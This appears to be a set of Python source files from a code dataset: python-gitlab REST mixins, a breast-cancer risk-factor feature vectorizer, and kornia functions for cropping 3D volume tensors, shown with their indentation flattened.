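# stats = issue.time_stats()  # e.g. {"time_estimate": 12600, "total_time_spent": 3600, ...}
# issue.reset_spent_time()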
class ParticipantsMixin(_RestObjectBase):
_id_attr: Optional[str]
_attrs: Dict[str, Any]
_module: ModuleType
_parent_attrs: Dict[str, Any]
_updated_attrs: Dict[str, Any]
manager: base.RESTManager
@cli.register_custom_action(("ProjectMergeRequest", "ProjectIssue"))
@exc.on_http_error(exc.GitlabListError)
def participants(self, **kwargs: Any) -> Dict[str, Any]:
"""List the participants.
Args:
all: If True, return all the items, without pagination
per_page: Number of items to retrieve per request
page: ID of the page to return (starts with page 1)
as_list: If set to False and no pagination option is
defined, return a generator instead of a list
**kwargs: Extra options to send to the server (e.g. sudo)
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabListError: If the list could not be retrieved
Returns:
The list of participants
"""
path = f"{self.manager.path}/{self.encoded_id}/participants"
result = self.manager.gitlab.http_get(path, **kwargs)
if TYPE_CHECKING:
assert not isinstance(result, requests.Response)
return result
class BadgeRenderMixin(_RestManagerBase):
@cli.register_custom_action(
("GroupBadgeManager", "ProjectBadgeManager"), ("link_url", "image_url")
)
@exc.on_http_error(exc.GitlabRenderError)
def render(self, link_url: str, image_url: str, **kwargs: Any) -> Dict[str, Any]:
"""Preview link_url and image_url after interpolation.
Args:
link_url: URL of the badge link
image_url: URL of the badge image
**kwargs: Extra options to send to the server (e.g. sudo)
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabRenderError: If the rendering failed
Returns:
The rendering properties
"""
path = f"{self.path}/render"
data = {"link_url": link_url, "image_url": image_url}
result = self.gitlab.http_get(path, data, **kwargs)
if TYPE_CHECKING:
assert not isinstance(result, requests.Response)
return result
class PromoteMixin(_RestObjectBase):
_id_attr: Optional[str]
_attrs: Dict[str, Any]
_module: ModuleType
_parent_attrs: Dict[str, Any]
_updated_attrs: Dict[str, Any]
_update_uses_post: bool = False
manager: base.RESTManager
def _get_update_method(
self,
) -> Callable[..., Union[Dict[str, Any], requests.Response]]:
"""Return the HTTP method to use.
Returns:
http_put (default) or http_post
"""
if self._update_uses_post:
http_method = self.manager.gitlab.http_post
else:
http_method = self.manager.gitlab.http_put
return http_method
@exc.on_http_error(exc.GitlabPromoteError)
def promote(self, **kwargs: Any) -> Dict[str, Any]:
"""Promote the item.
Args:
**kwargs: Extra options to send to the server (e.g. sudo)
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabPromoteError: If the item could not be promoted
GitlabParsingError: If the json data could not be parsed
Returns:
The updated object data (*not* a RESTObject)
"""
path = f"{self.manager.path}/{self.encoded_id}/promote"
http_method = self._get_update_method()
result = http_method(path, **kwargs)
if TYPE_CHECKING:
assert not isinstance(result, requests.Response)
return result
the-stack_0_6448
import json
import numpy as np
import pdb
import copy
import torch
from scipy.special import binom
MISSING_VALUE = -1
HASNT_HAPPENED_VALUE = -5
RACE_CODE_TO_NAME = {
1: 'White',
2: 'African American',
3: 'American Indian, Eskimo, Aleut',
4: 'Asian or Pacific Islander',
5: 'Other Race',
6: 'Caribbean/West Indian',
7: 'Unknown',
8: 'Hispanic',
9: 'Chinese',
10: 'Japanese',
11: 'Filipino',
12: 'Hawaiian',
13: 'Other Asian'
}
TREAT_MISSING_AS_NEGATIVE = False
NEGATIVE_99 = -99
class RiskFactorVectorizer():
def __init__(self, args):
self.risk_factor_metadata = parse_risk_factors(args)
self.risk_factor_transformers = \
{'binary_family_history': self.transform_binary_family_history,
'binary_biopsy_benign': self.get_binary_occurence_transformer(
'biopsy_hyperplasia', 'biopsy_hyperplasia_age'),
'binary_biopsy_LCIS': self.get_binary_occurence_transformer(
'biopsy_LCIS', 'biopsy_LCIS_age'),
'binary_biopsy_atypical_hyperplasia': self.get_binary_occurence_transformer(
'biopsy_atypical_hyperplasia', 'biopsy_atypical_hyperplasia_age'),
'age': self.get_exam_one_hot_risk_factor_transformer('age', [40, 50, 60, 70, 80]),
'menarche_age': self.get_age_based_risk_factor_transformer('menarche_age', [10, 12, 14, 16]),
'menopause_age': self.get_age_based_risk_factor_transformer('menopause_age', [45, 50, 55, 60]),
'first_pregnancy_age': self.get_age_based_risk_factor_transformer( 'first_pregnancy_age', [20, 25, 30, 35, 40]),
'density': self.get_image_biomarker_transformer('density'),
'bpe': self.get_image_biomarker_transformer('bpe'),
'5yearcancer': self.get_binary_transformer('5yearcancer'),
'prior_hist': self.get_binary_transformer('prior_hist'),
'years_to_cancer': self.get_exam_one_hot_risk_factor_transformer('years_to_cancer', [0, 1, 2, 3, 4, 10]),
'race': self.transform_race,
'parous': self.transform_parous,
'menopausal_status': self.transform_menopausal_status,
'weight': self.get_exam_one_hot_risk_factor_transformer('weight', [100, 130, 160, 190, 220, 250]),
'height': self.get_exam_one_hot_risk_factor_transformer('height', [50, 55, 60, 65, 70, 75]),
'ovarian_cancer': self.get_binary_occurence_transformer('ovarian_cancer',
'ovarian_cancer_age'),
'ovarian_cancer_age': self.get_age_based_risk_factor_transformer('ovarian_cancer_age',[30, 40, 50, 60, 70]),
'ashkenazi': self.get_binary_transformer('ashkenazi', use_patient_factors=True),
'brca': self.transform_brca,
'mom_bc_cancer_history': self.get_binary_relative_cancer_history_transformer('M'),
'm_aunt_bc_cancer_history': self.get_binary_relative_cancer_history_transformer('MA'),
'p_aunt_bc_cancer_history': self.get_binary_relative_cancer_history_transformer('PA'),
'm_grandmother_bc_cancer_history': self.get_binary_relative_cancer_history_transformer('MG'),
'p_grantmother_bc_cancer_history': self.get_binary_relative_cancer_history_transformer('PG'),
'brother_bc_cancer_history': self.get_binary_relative_cancer_history_transformer('B'),
'father_bc_cancer_history': self.get_binary_relative_cancer_history_transformer('F'),
'daughter_bc_cancer_history': self.get_binary_relative_cancer_history_transformer('D'),
'sister_bc_cancer_history': self.get_binary_relative_cancer_history_transformer('S'),
'mom_oc_cancer_history': self.get_binary_relative_cancer_history_transformer('M', cancer='ovarian_cancer'),
'm_aunt_oc_cancer_history': self.get_binary_relative_cancer_history_transformer('MA', cancer='ovarian_cancer'),
'p_aunt_oc_cancer_history': self.get_binary_relative_cancer_history_transformer('PA', cancer='ovarian_cancer'),
'm_grandmother_oc_cancer_history': self.get_binary_relative_cancer_history_transformer('MG', cancer='ovarian_cancer'),
'p_grantmother_oc_cancer_history': self.get_binary_relative_cancer_history_transformer('PG', cancer='ovarian_cancer'),
'sister_oc_cancer_history': self.get_binary_relative_cancer_history_transformer('S', cancer='ovarian_cancer'),
'daughter_oc_cancer_history': self.get_binary_relative_cancer_history_transformer('D', cancer='ovarian_cancer'),
'hrt_type': self.get_hrt_information_transformer('type'),
'hrt_duration': self.get_hrt_information_transformer('duration'),
'hrt_years_ago_stopped': self.get_hrt_information_transformer('years_ago_stopped')
}
self.risk_factor_keys = args.risk_factor_keys
self.feature_names = []
self.risk_factor_key_to_num_class = {}
for k in self.risk_factor_keys:
if k not in self.risk_factor_transformers.keys():
raise Exception("Risk factor key '{}' not supported.".format(k))
names = self.risk_factor_transformers[k](None, None, just_return_feature_names=True)
self.risk_factor_key_to_num_class[k] = len(names)
self.feature_names.extend(names)
args.risk_factor_key_to_num_class = self.risk_factor_key_to_num_class
@property
def vector_length(self):
return len(self.feature_names)
def get_feature_names(self):
return copy.deepcopy(self.feature_names)
def one_hot_vectorizor(self, value, cutoffs):
one_hot_vector = torch.zeros(len(cutoffs) + 1)
if value == MISSING_VALUE:
return one_hot_vector
for i, cutoff in enumerate(cutoffs):
if value <= cutoff:
one_hot_vector[i] = 1
return one_hot_vector
one_hot_vector[-1] = 1
return one_hot_vector
def one_hot_feature_names(self, risk_factor_name, cutoffs):
feature_names = [""] * (len(cutoffs) + 1)
feature_names[0] = "{}_lt_{}".format(risk_factor_name, cutoffs[0])
feature_names[-1] = "{}_gt_{}".format(risk_factor_name, cutoffs[-1])
for i in range(1, len(cutoffs)):
feature_names[i] = "{}_{}_{}".format(risk_factor_name, cutoffs[i - 1], cutoffs[i])
return feature_names
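    # Worked example of the bucketing pair above (illustrative values):
    # cutoffs [45, 50, 55, 60] yield five buckets named
    #   ['menopause_age_lt_45', 'menopause_age_45_50', 'menopause_age_50_55',
    #    'menopause_age_55_60', 'menopause_age_gt_60'],
    # one_hot_vectorizor(52, [45, 50, 55, 60]) returns tensor([0., 0., 1., 0., 0.]),
    # and a MISSING_VALUE input returns the all-zero vector.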
def get_age_based_risk_factor_transformer(self, risk_factor_key, age_cutoffs):
def transform_age_based_risk_factor(patient_factors, exam_factors, just_return_feature_names=False):
if just_return_feature_names:
return self.one_hot_feature_names(risk_factor_key, age_cutoffs)
# if age-based risk factor, like menopause_age or first_pregnancy_age, is after the age at the exam, then treat it like it has not happened yet.
exam_age = int(exam_factors['age'])
age_based_risk_factor = int(patient_factors[risk_factor_key])
if exam_age != MISSING_VALUE and exam_age < age_based_risk_factor:
age_based_risk_factor = MISSING_VALUE # effectively same as missing
return self.one_hot_vectorizor(age_based_risk_factor, age_cutoffs)
return transform_age_based_risk_factor
def get_exam_one_hot_risk_factor_transformer(self, risk_factor_key, cutoffs):
def transform_exam_one_hot_risk_factor(patient_factors, exam_factors, just_return_feature_names=False):
if just_return_feature_names:
return self.one_hot_feature_names(risk_factor_key, cutoffs)
risk_factor = int(exam_factors[risk_factor_key])
return self.one_hot_vectorizor(risk_factor, cutoffs)
return transform_exam_one_hot_risk_factor
def get_binary_occurence_transformer(self, occurence_key, occurence_age_key):
def transform_binary_occurence(patient_factors, exam_factors, just_return_feature_names=False):
if just_return_feature_names:
return ['binary_{}'.format(occurence_key)]
binary_occurence = torch.zeros(1)
occurence = int(patient_factors[occurence_key])
occurence_age = int(patient_factors[occurence_age_key])
exam_age = int(exam_factors['age'])
if occurence and (occurence_age == MISSING_VALUE or exam_age >= occurence_age):
binary_occurence[0] = 1
return binary_occurence
return transform_binary_occurence
def get_binary_transformer(self, risk_factor_key, use_patient_factors=False):
def transform_binary(patient_factors, exam_factors, just_return_feature_names=False):
if just_return_feature_names:
return ['binary_{}'.format(risk_factor_key)]
binary_risk_factor = torch.zeros(1)
risk_factor = int(patient_factors[risk_factor_key]) if use_patient_factors else int(
exam_factors[risk_factor_key])
# If a binary risk factor is -1, we also want to treat it as negative (0)
binary_risk_factor[0] = 1 if risk_factor == 1 else 0
return binary_risk_factor
return transform_binary
def get_binary_relative_cancer_history_transformer(self, relative_code, cancer='breast_cancer'):
def transform_binary_relative_cancer_history(patient_factors, exam_factors, just_return_feature_names=False):
if just_return_feature_names:
return ['{}_{}_hist'.format(relative_code, cancer)]
binary_relative_cancer_history = torch.zeros(1)
relative_list = patient_factors['relatives'][relative_code]
for rel in relative_list:
if rel[cancer] == 1:
binary_relative_cancer_history[0] = 1
return binary_relative_cancer_history
return transform_binary_relative_cancer_history
def get_image_biomarker_transformer(self, name):
def image_biomarker_transformer(patient_factors, exam_factors, just_return_feature_names=False):
if just_return_feature_names:
return (["{}_{}".format(name, i) for i in range(1,5)])
image_biomarker_vector = torch.zeros(4)
image_biomarker = int(exam_factors[name])
if image_biomarker != MISSING_VALUE:
image_biomarker_vector[image_biomarker - 1] = 1
return image_biomarker_vector
return image_biomarker_transformer
def transform_binary_family_history(self, patient_factors, exam_factors, just_return_feature_names=False):
if just_return_feature_names:
return (['binary_family_history'])
relatives_dict = patient_factors['relatives']
binary_family_history = torch.zeros(1)
for relative, relative_list in relatives_dict.items():
if len(relative_list) > 0:
binary_family_history[0] = 1
return binary_family_history
def transform_parous(self, patient_factors, exam_factors, just_return_feature_names=False):
if just_return_feature_names:
return (['parous'])
binary_parous = torch.zeros(1)
exam_age = int(exam_factors['age'])
binary_parous[0] = 1 if patient_factors['num_births'] != MISSING_VALUE else 0
if patient_factors['first_pregnancy_age'] != MISSING_VALUE:
binary_parous[0] = 1 if patient_factors['first_pregnancy_age'] < exam_age else 0
return binary_parous
def transform_race(self, patient_factors, exam_factors, just_return_feature_names=False):
values = range(1, 14)
race_vector = torch.zeros(len(values))
if just_return_feature_names:
return [RACE_CODE_TO_NAME[i] for i in values]
race = int(patient_factors['race'])
race_vector[race - 1] = 1
return race_vector
def transform_menopausal_status(self, patient_factors, exam_factors, just_return_feature_names=False):
if just_return_feature_names:
return ['pre', 'peri', 'post', 'unknown']
exam_age = int(exam_factors['age'])
menopausal_status = 3 # unknown
age_at_menopause = patient_factors['menopause_age'] \
if patient_factors['menopause_age'] != MISSING_VALUE else NEGATIVE_99
if age_at_menopause != NEGATIVE_99:
if age_at_menopause < exam_age:
menopausal_status = 2
elif age_at_menopause == exam_age:
menopausal_status = 1
elif age_at_menopause > exam_age:
menopausal_status = 0
else:
if TREAT_MISSING_AS_NEGATIVE:
menopausal_status = 0
menopausal_status_vector = torch.zeros(4)
menopausal_status_vector[menopausal_status] = 1
return menopausal_status_vector
def transform_brca(self, patient_factors, exam_factors, just_return_feature_names=False):
if just_return_feature_names:
return ['never or unknown', 'negative result', 'brca1', 'brca2']
genetic_testing_patient = 0
brca1 = patient_factors['brca1']
brca2 = patient_factors['brca2']
if brca2 == 1:
genetic_testing_patient = 3
elif brca1 == 1:
genetic_testing_patient = 2
elif brca1 == 0:
genetic_testing_patient = 1
genetic_testing_vector = torch.zeros(4)
genetic_testing_vector[genetic_testing_patient] = 1
return genetic_testing_vector
def get_hrt_information_transformer(self, piece):
def transform_hrt_information(patient_factors, exam_factors, just_return_feature_names=False):
year_cutoffs = [1,3,5,7]
piece_to_feature_names = {'type': ['hrt_combined', 'hrt_estrogen', 'hrt_unknown'],
'duration': self.one_hot_feature_names('hrt_duration', year_cutoffs),
'years_ago_stopped': self.one_hot_feature_names('hrt_years_ago_stopped', year_cutoffs)}
assert piece in piece_to_feature_names.keys()
if just_return_feature_names:
return piece_to_feature_names[piece]
hrt_vector = torch.zeros(3)
duration = MISSING_VALUE
hrt_type = MISSING_VALUE
hrt_years_ago_stopped = MISSING_VALUE
first_age_key = None
last_age_key = None
duration_key = None
current_age = int(exam_factors['age'])
if patient_factors['combined_hrt']:
hrt_type = 0
first_age_key = 'combined_hrt_first_age'
last_age_key = 'combined_hrt_last_age'
duration_key = 'combined_hrt_duration'
elif patient_factors['estrogen_hrt']:
hrt_type = 1
first_age_key = 'estrogen_hrt_first_age'
last_age_key = 'estrogen_hrt_last_age'
duration_key = 'estrogen_hrt_duration'
elif patient_factors['unknown_hrt']:
hrt_type = 2
first_age_key = 'unknown_hrt_first_age'
last_age_key = 'unknown_hrt_last_age'
duration_key = 'unknown_hrt_duration'
if first_age_key:
first_age = patient_factors[first_age_key]
last_age = patient_factors[last_age_key]
extracted_duration = patient_factors[duration_key]
if last_age >= current_age and current_age != MISSING_VALUE:
if first_age != MISSING_VALUE and first_age > current_age:
# future_user
hrt_type = MISSING_VALUE
elif extracted_duration != MISSING_VALUE and last_age - extracted_duration > current_age:
# future_user
hrt_type = MISSING_VALUE
else:
duration = current_age - first_age if current_age != MISSING_VALUE and first_age != MISSING_VALUE else extracted_duration
elif last_age != MISSING_VALUE:
hrt_years_ago_stopped = current_age - last_age
if extracted_duration != MISSING_VALUE:
duration = extracted_duration
elif first_age != MISSING_VALUE and last_age != MISSING_VALUE:
duration = last_age - first_age
assert duration >= 0
else:
duration = extracted_duration if extracted_duration != MISSING_VALUE else MISSING_VALUE
if hrt_type > MISSING_VALUE:
hrt_vector[hrt_type] = 1
piece_to_feature_names = {'type': hrt_vector,
'duration': self.one_hot_vectorizor(duration, year_cutoffs),
'years_ago_stopped': self.one_hot_vectorizor(hrt_years_ago_stopped, year_cutoffs)}
return piece_to_feature_names[piece]
return transform_hrt_information
def transform_5yearcancer(self, patient_factors, exam_factors, just_return_feature_names=False):
if just_return_feature_names:
return (['5yearcancer'])
binary_5yearcancer = torch.zeros(1)
binary_5yearcancer[0] = int(exam_factors['5yearcancer'])
return binary_5yearcancer
def transform(self, patient_factors, exam_factors):
risk_factor_vecs = [self.risk_factor_transformers[key](patient_factors, exam_factors) for key in
self.risk_factor_keys]
return risk_factor_vecs
def get_risk_factors_for_sample(self, sample):
sample_patient_factors = self.risk_factor_metadata[sample['ssn']]
sample_exam_factors = self.risk_factor_metadata[sample['ssn']]['accessions'][sample['exam']]
risk_factor_vector = self.transform(sample_patient_factors, sample_exam_factors)
return risk_factor_vector
def get_buckets_for_sample(self, sample):
sample_patient_factors = self.risk_factor_metadata[sample['ssn']]
sample_exam_factors = self.risk_factor_metadata[sample['ssn']]['accessions'][sample['exam']]
buckets = {}
for key in self.risk_factor_keys:
names = self.risk_factor_transformers[key](None, None, just_return_feature_names=True)
vectorized = self.risk_factor_transformers[key](sample_patient_factors, sample_exam_factors)
if sum(vectorized) == 0:
buckets[key] = 'missing_or_negative'
else:
                name_index = int(vectorized.dot(torch.arange(len(vectorized), dtype=vectorized.dtype)))  # match dtypes for torch.dot
buckets[key] = names[name_index]
        return buckets
def parse_risk_factors(args):
'''
Parse the risk factors json file and return a dict mapping ssns to patient dictionaries. Each patient dictionary
contains patient-level risk factors (e.g. race), as well as an 'accessions' key, that maps to a dictionary
mapping accesion#s to dictionaries containing exam-level risk factors (e.g. age).
'''
try:
metadata_json = json.load(open(args.metadata_path, 'r'))
except Exception as e:
raise Exception("Not found {} {}".format(args.metadata_path, e))
try:
risk_factor_metadata = json.load(open(args.risk_factor_metadata_path, 'r'))
except Exception as e:
raise Exception(
"Metadata file {} could not be parsed! Exception: {}!".format(args.risk_factor_metadata_path, e))
if '5yearcancer' in args.risk_factor_keys:
for patient in metadata_json:
ssn = patient['ssn']
for exam in patient['accessions']:
acc = exam['accession']
label = 1 if exam['label'] == 'POS' else 0
risk_factor_metadata[ssn]['accessions'][acc]['5yearcancer'] = label
if 'prior_hist' in args.risk_factor_keys:
for patient in metadata_json:
if 'nwh' in args.dataset:
ssn = patient['mrn']
risk_factor_metadata[ssn]['accessions'][ssn]['prior_hist'] = 0
else:
ssn = patient['ssn']
for exam in patient['accessions']:
acc = exam['accession']
risk_factor_metadata[ssn]['accessions'][acc]['prior_hist'] = exam['prior_hist']
if 'years_to_cancer' in args.risk_factor_keys:
for patient in metadata_json:
ssn = patient['ssn']
for exam in patient['accessions']:
acc = exam['accession']
risk_factor_metadata[ssn]['accessions'][acc]['years_to_cancer'] = exam['years_to_cancer']
if 'bpe' in args.risk_factor_keys:
for patient in metadata_json:
ssn = patient['ssn']
for exam in patient['accessions']:
acc = exam['accession']
risk_factor_metadata[ssn]['accessions'][acc]['bpe'] = exam['bpe'] if 'bpe' in exam else MISSING_VALUE
return risk_factor_metadata
the-stack_0_6449
from typing import Tuple
import torch
from kornia.geometry.bbox import infer_bbox_shape3d, validate_bbox3d
from .projwarp import get_perspective_transform3d, warp_affine3d
__all__ = [
"crop_and_resize3d",
"crop_by_boxes3d",
"crop_by_transform_mat3d",
"center_crop3d",
]
def crop_and_resize3d(
tensor: torch.Tensor,
boxes: torch.Tensor,
size: Tuple[int, int, int],
interpolation: str = 'bilinear',
align_corners: bool = False,
) -> torch.Tensor:
r"""Extract crops from 3D volumes (5D tensor) and resize them.
Args:
tensor: the 3D volume tensor with shape (B, C, D, H, W).
boxes: a tensor with shape (B, 8, 3) containing the coordinates of the bounding boxes
to be extracted. The tensor must have the shape of Bx8x3, where each box is defined in the clockwise
order: front-top-left, front-top-right, front-bottom-right, front-bottom-left, back-top-left,
back-top-right, back-bottom-right, back-bottom-left. The coordinates must be in x, y, z order.
size: a tuple with the height and width that will be
used to resize the extracted patches.
interpolation: Interpolation flag.
align_corners: mode for grid_generation.
Returns:
tensor containing the patches with shape (Bx)CxN1xN2xN3.
Example:
>>> input = torch.arange(64, dtype=torch.float32).view(1, 1, 4, 4, 4)
>>> input
tensor([[[[[ 0., 1., 2., 3.],
[ 4., 5., 6., 7.],
[ 8., 9., 10., 11.],
[12., 13., 14., 15.]],
<BLANKLINE>
[[16., 17., 18., 19.],
[20., 21., 22., 23.],
[24., 25., 26., 27.],
[28., 29., 30., 31.]],
<BLANKLINE>
[[32., 33., 34., 35.],
[36., 37., 38., 39.],
[40., 41., 42., 43.],
[44., 45., 46., 47.]],
<BLANKLINE>
[[48., 49., 50., 51.],
[52., 53., 54., 55.],
[56., 57., 58., 59.],
[60., 61., 62., 63.]]]]])
>>> boxes = torch.tensor([[
... [1., 1., 1.],
... [3., 1., 1.],
... [3., 3., 1.],
... [1., 3., 1.],
... [1., 1., 2.],
... [3., 1., 2.],
... [3., 3., 2.],
... [1., 3., 2.],
... ]]) # 1x8x3
>>> crop_and_resize3d(input, boxes, (2, 2, 2), align_corners=True)
tensor([[[[[21.0000, 23.0000],
[29.0000, 31.0000]],
<BLANKLINE>
[[37.0000, 39.0000],
[45.0000, 47.0000]]]]])
"""
if not isinstance(tensor, (torch.Tensor)):
raise TypeError(f"Input tensor type is not a torch.Tensor. Got {type(tensor)}")
if not isinstance(boxes, (torch.Tensor)):
raise TypeError(f"Input boxes type is not a torch.Tensor. Got {type(boxes)}")
    if not isinstance(size, (tuple, list)) or len(size) != 3:
raise ValueError(f"Input size must be a tuple/list of length 3. Got {size}")
if len(tensor.shape) != 5:
raise AssertionError(f"Only tensor with shape (B, C, D, H, W) supported. Got {tensor.shape}.")
# unpack input data
dst_d, dst_h, dst_w = size[0], size[1], size[2]
# [x, y, z] origin
# from front to back
# top-left, top-right, bottom-right, bottom-left
points_src: torch.Tensor = boxes
# [x, y, z] destination
# from front to back
# top-left, top-right, bottom-right, bottom-left
points_dst: torch.Tensor = torch.tensor(
[
[
[0, 0, 0],
[dst_w - 1, 0, 0],
[dst_w - 1, dst_h - 1, 0],
[0, dst_h - 1, 0],
[0, 0, dst_d - 1],
[dst_w - 1, 0, dst_d - 1],
[dst_w - 1, dst_h - 1, dst_d - 1],
[0, dst_h - 1, dst_d - 1],
]
],
dtype=tensor.dtype,
device=tensor.device,
).expand(points_src.shape[0], -1, -1)
return crop_by_boxes3d(tensor, points_src, points_dst, interpolation, align_corners)
def center_crop3d(
tensor: torch.Tensor, size: Tuple[int, int, int], interpolation: str = 'bilinear', align_corners: bool = True
) -> torch.Tensor:
r"""Crop the 3D volumes (5D tensor) at the center.
Args:
tensor: the 3D volume tensor with shape (B, C, D, H, W).
size: a tuple with the expected depth, height and width
of the output patch.
interpolation: Interpolation flag.
align_corners : mode for grid_generation.
Returns:
the output tensor with patches.
Examples:
>>> input = torch.arange(64, dtype=torch.float32).view(1, 1, 4, 4, 4)
>>> input
tensor([[[[[ 0., 1., 2., 3.],
[ 4., 5., 6., 7.],
[ 8., 9., 10., 11.],
[12., 13., 14., 15.]],
<BLANKLINE>
[[16., 17., 18., 19.],
[20., 21., 22., 23.],
[24., 25., 26., 27.],
[28., 29., 30., 31.]],
<BLANKLINE>
[[32., 33., 34., 35.],
[36., 37., 38., 39.],
[40., 41., 42., 43.],
[44., 45., 46., 47.]],
<BLANKLINE>
[[48., 49., 50., 51.],
[52., 53., 54., 55.],
[56., 57., 58., 59.],
[60., 61., 62., 63.]]]]])
>>> center_crop3d(input, (2, 2, 2), align_corners=True)
tensor([[[[[21.0000, 22.0000],
[25.0000, 26.0000]],
<BLANKLINE>
[[37.0000, 38.0000],
[41.0000, 42.0000]]]]])
"""
if not isinstance(tensor, (torch.Tensor)):
raise TypeError(f"Input tensor type is not a torch.Tensor. Got {type(tensor)}")
if len(tensor.shape) != 5:
raise AssertionError(f"Only tensor with shape (B, C, D, H, W) supported. Got {tensor.shape}.")
    if not isinstance(size, (tuple, list)) or len(size) != 3:
raise ValueError(f"Input size must be a tuple/list of length 3. Got {size}")
# unpack input sizes
dst_d, dst_h, dst_w = size
src_d, src_h, src_w = tensor.shape[-3:]
# compute start/end offsets
dst_d_half = dst_d / 2
dst_h_half = dst_h / 2
dst_w_half = dst_w / 2
src_d_half = src_d / 2
src_h_half = src_h / 2
src_w_half = src_w / 2
start_x = src_w_half - dst_w_half
start_y = src_h_half - dst_h_half
start_z = src_d_half - dst_d_half
end_x = start_x + dst_w - 1
end_y = start_y + dst_h - 1
end_z = start_z + dst_d - 1
# [x, y, z] origin
# top-left-front, top-right-front, bottom-right-front, bottom-left-front
# top-left-back, top-right-back, bottom-right-back, bottom-left-back
points_src: torch.Tensor = torch.tensor(
[
[
[start_x, start_y, start_z],
[end_x, start_y, start_z],
[end_x, end_y, start_z],
[start_x, end_y, start_z],
[start_x, start_y, end_z],
[end_x, start_y, end_z],
[end_x, end_y, end_z],
[start_x, end_y, end_z],
]
],
device=tensor.device,
)
# [x, y, z] destination
# top-left-front, top-right-front, bottom-right-front, bottom-left-front
# top-left-back, top-right-back, bottom-right-back, bottom-left-back
points_dst: torch.Tensor = torch.tensor(
[
[
[0, 0, 0],
[dst_w - 1, 0, 0],
[dst_w - 1, dst_h - 1, 0],
[0, dst_h - 1, 0],
[0, 0, dst_d - 1],
[dst_w - 1, 0, dst_d - 1],
[dst_w - 1, dst_h - 1, dst_d - 1],
[0, dst_h - 1, dst_d - 1],
]
],
device=tensor.device,
).expand(points_src.shape[0], -1, -1)
return crop_by_boxes3d(
tensor, points_src.to(tensor.dtype), points_dst.to(tensor.dtype), interpolation, align_corners
)
def crop_by_boxes3d(
tensor: torch.Tensor,
src_box: torch.Tensor,
dst_box: torch.Tensor,
interpolation: str = 'bilinear',
align_corners: bool = False,
) -> torch.Tensor:
"""Perform crop transform on 3D volumes (5D tensor) by bounding boxes.
Given an input tensor, this function selected the interested areas by the provided bounding boxes (src_box).
Then the selected areas would be fitted into the targeted bounding boxes (dst_box) by a perspective transformation.
So far, the ragged tensor is not supported by PyTorch right now. This function hereby requires the bounding boxes
in a batch must be rectangles with same width, height and depth.
Args:
tensor : the 3D volume tensor with shape (B, C, D, H, W).
src_box : a tensor with shape (B, 8, 3) containing the coordinates of the bounding boxes
to be extracted. The tensor must have the shape of Bx8x3, where each box is defined in the clockwise
order: front-top-left, front-top-right, front-bottom-right, front-bottom-left, back-top-left,
back-top-right, back-bottom-right, back-bottom-left. The coordinates must be in x, y, z order.
dst_box: a tensor with shape (B, 8, 3) containing the coordinates of the bounding boxes
to be placed. The tensor must have the shape of Bx8x3, where each box is defined in the clockwise
order: front-top-left, front-top-right, front-bottom-right, front-bottom-left, back-top-left,
back-top-right, back-bottom-right, back-bottom-left. The coordinates must be in x, y, z order.
interpolation: Interpolation flag.
align_corners: mode for grid_generation.
Returns:
the output tensor with patches.
Examples:
>>> input = torch.tensor([[[
... [[ 0., 1., 2., 3.],
... [ 4., 5., 6., 7.],
... [ 8., 9., 10., 11.],
... [12., 13., 14., 15.]],
... [[16., 17., 18., 19.],
... [20., 21., 22., 23.],
... [24., 25., 26., 27.],
... [28., 29., 30., 31.]],
... [[32., 33., 34., 35.],
... [36., 37., 38., 39.],
... [40., 41., 42., 43.],
... [44., 45., 46., 47.]]]]])
>>> src_box = torch.tensor([[
... [1., 1., 1.],
... [3., 1., 1.],
... [3., 3., 1.],
... [1., 3., 1.],
... [1., 1., 2.],
... [3., 1., 2.],
... [3., 3., 2.],
... [1., 3., 2.],
... ]]) # 1x8x3
>>> dst_box = torch.tensor([[
... [0., 0., 0.],
... [2., 0., 0.],
... [2., 2., 0.],
... [0., 2., 0.],
... [0., 0., 1.],
... [2., 0., 1.],
... [2., 2., 1.],
... [0., 2., 1.],
... ]]) # 1x8x3
>>> crop_by_boxes3d(input, src_box, dst_box, interpolation='nearest', align_corners=True)
tensor([[[[[21., 22., 23.],
[25., 26., 27.],
[29., 30., 31.]],
<BLANKLINE>
[[37., 38., 39.],
[41., 42., 43.],
[45., 46., 47.]]]]])
"""
validate_bbox3d(src_box)
validate_bbox3d(dst_box)
if len(tensor.shape) != 5:
raise AssertionError(f"Only tensor with shape (B, C, D, H, W) supported. Got {tensor.shape}.")
# compute transformation between points and warp
# Note: Tensor.dtype must be float. "solve_cpu" not implemented for 'Long'
dst_trans_src: torch.Tensor = get_perspective_transform3d(src_box.to(tensor.dtype), dst_box.to(tensor.dtype))
# simulate broadcasting
dst_trans_src = dst_trans_src.expand(tensor.shape[0], -1, -1).type_as(tensor)
bbox = infer_bbox_shape3d(dst_box)
if not ((bbox[0] == bbox[0][0]).all() and (bbox[1] == bbox[1][0]).all() and (bbox[2] == bbox[2][0]).all()):
raise AssertionError(
"Cropping height, width and depth must be exact same in a batch."
f"Got height {bbox[0]}, width {bbox[1]} and depth {bbox[2]}."
)
patches: torch.Tensor = crop_by_transform_mat3d(
tensor,
dst_trans_src,
(int(bbox[0][0].item()), int(bbox[1][0].item()), int(bbox[2][0].item())),
mode=interpolation,
align_corners=align_corners,
)
return patches
def crop_by_transform_mat3d(
tensor: torch.Tensor,
transform: torch.Tensor,
out_size: Tuple[int, int, int],
mode: str = 'bilinear',
padding_mode: str = 'zeros',
align_corners: bool = True,
) -> torch.Tensor:
"""Perform crop transform on 3D volumes (5D tensor) given a perspective transformation matrix.
Args:
        tensor: the 3D volume tensor with shape (B, C, D, H, W).
transform: a perspective transformation matrix with shape (B, 4, 4).
out_size: size of the output image (depth, height, width).
mode: interpolation mode to calculate output values
``'bilinear'`` | ``'nearest'``.
padding_mode: padding mode for outside grid values
``'zeros'`` | ``'border'`` | ``'reflection'``.
align_corners: mode for grid_generation.
Returns:
the output tensor with patches.
"""
# simulate broadcasting
dst_trans_src = transform.expand(tensor.shape[0], -1, -1)
patches: torch.Tensor = warp_affine3d(
tensor, dst_trans_src[:, :3, :], out_size, flags=mode, padding_mode=padding_mode, align_corners=align_corners
)
return patches
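# A minimal usage sketch for crop_by_transform_mat3d (not part of the original
# module); the tensor sizes and the identity transform below are illustrative
# assumptions only:
#
#   volume = torch.rand(1, 1, 4, 4, 4)        # (B, C, D, H, W)
#   identity = torch.eye(4).unsqueeze(0)      # (B, 4, 4) perspective transform
#   patches = crop_by_transform_mat3d(volume, identity, (2, 2, 2))
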